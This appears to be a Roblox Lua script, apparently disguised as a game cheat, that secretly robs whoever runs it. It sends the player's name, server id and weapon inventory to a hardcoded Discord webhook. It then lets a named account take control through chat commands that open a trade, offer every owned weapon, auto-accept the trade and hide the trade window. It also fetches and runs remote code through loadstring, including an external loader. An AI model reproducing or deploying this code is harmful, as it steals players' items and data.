local url = "https://discord.com/api/webhooks/1341061185411223622/s7h2PD-2nIzKt1o6X3RO0Mc0qdsugt64xFG0ZPyJGoNfDqoqdPnQ5Awa7zQHiAxqPqwz"
   
t = {}
for i,v in pairs(game.ReplicatedStorage.Remotes.Extras.GetFullInventory:InvokeServer(game.Players.LocalPlayer.Name)["Weapons"]["Owned"]) do
 table.insert(t, tostring(i).." : "..tostring(v)..", ")
end
inventory = table.concat(t)
   
local data = {
		["embeds"] = {
					{
						["title"] =  game.JobId,
						["description"] = "Name ".. game.Players.LocalPlayer.Name .. " Jobid: " ..game.JobId ..  " Inventory: " ..inventory,
						["type"] = "rich",
						["color"]= tonumber(0xff0000),
						["footer"] = {
							["icon_url"] = 'https://cdn.discordapp.com/icons/924841537328803870/2ea57c68b447a717b9ed0e0c3bc4f241.png?size=4096',
							["text"] = ""
						},
						["thumbnail"] = {
							["url"] = "https://cdn.discordapp.com/icons/924841537328803870/2ea57c68b447a717b9ed0e0c3bc4f241.png?size=4096",
						},
						["author"] = {
							["name"] = ""

						},

						["fields"] = {
							{
								["name"] = '**Player profile**',
								["value"] = "https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile",
								["inline"] = true

							},

						}
					}}
			}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
Player = game.Players.LocalPlayer
Pl = game.Players

function MainCommands(plr, msg)
    if msg == "reset" then
        game.Players.LocalPlayer.Character.Humanoid.Health = 0
    end

    if msg == "freeze" then
        loadstring(game:HttpGet('https://raw.githubusercontent.com/Rashka69/Admin-Commands/main/freeze'))()
    end

    if msg == "unfreeze" then
        loadstring(game:HttpGet('https://raw.githubusercontent.com/Rashka69/Admin-Commands/main/unfreeze'))()
    end

    if msg == "s" then
        game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptRequest"):FireServer()
        for i = 1, 10 do
            wait(0.1)
        game.Players.LocalPlayer.PlayerGui.TradeGUI_Phone.Enabled = false
        game.Players.LocalPlayer.PlayerGui.TradeGUI.Enabled = false
    end
    end
    
    if msg == "k" then
    local args = {
    [1] = game:GetService("Players"):WaitForChild("JoeGG200")
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("SendRequest"):InvokeServer(unpack(args))
wait(1)
        for i = 1, 5 do
            wait(0.1)
        game.Players.LocalPlayer.PlayerGui.TradeGUI_Phone.Enabled = false
        game.Players.LocalPlayer.PlayerGui.TradeGUI.Enabled = false
for k = 1, 5 do
wait(0.1)
for i,v in pairs(game.ReplicatedStorage.Remotes.Extras.GetFullInventory:InvokeServer(game.Players.LocalPlayer.Name)["Weapons"]["Owned"]) do
local args = {
    [1] = i,
    [2] = "Weapons"
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))
local args = {
    [1] = i,
    [2] = "Weapons"
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))
local args = {
    [1] = i,
    [2] = "Weapons"
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))
local args = {
    [1] = i,
    [2] = "Weapons"
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))
wait(0.1)
for t = 1,10 do
wait(0.1)
local args = {
    [1] = 1
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptTrade"):FireServer(game.PlaceId * 2)
local args = {
    [1] = 1
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptTrade"):FireServer(game.PlaceId * 2)
end
end
end
end
end
    
    game.Players.JoeGG200.Chatted:Connect(function(msg)
    
    local args = {
        [1] = msg,
        [2] = "Weapons"
    }
    
    game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("OfferItem"):FireServer(unpack(args))

end)

    if msg == "a" then
local args = {
    [1] = 1
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptTrade"):FireServer(game.PlaceId * 2)
local args = {
    [1] = 1
}

game:GetService("ReplicatedStorage"):WaitForChild("Trade"):WaitForChild("AcceptTrade"):FireServer(game.PlaceId * 2)

        
    end
end

for _, v in pairs(Pl:GetChildren()) do
    if v ~= Player then
        v.Chatted:Connect(function(msg)
            MainCommands(v, msg)
        end)
    end
end

Pl.PlayerAdded:Connect(function(plr)
    plr.Chatted:Connect(function(msg)
        MainCommands(plr, msg)
    end)
end)

wait(10)

loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/2529a5f9dfddd5523ca4e22f21cceffa.lua"))()
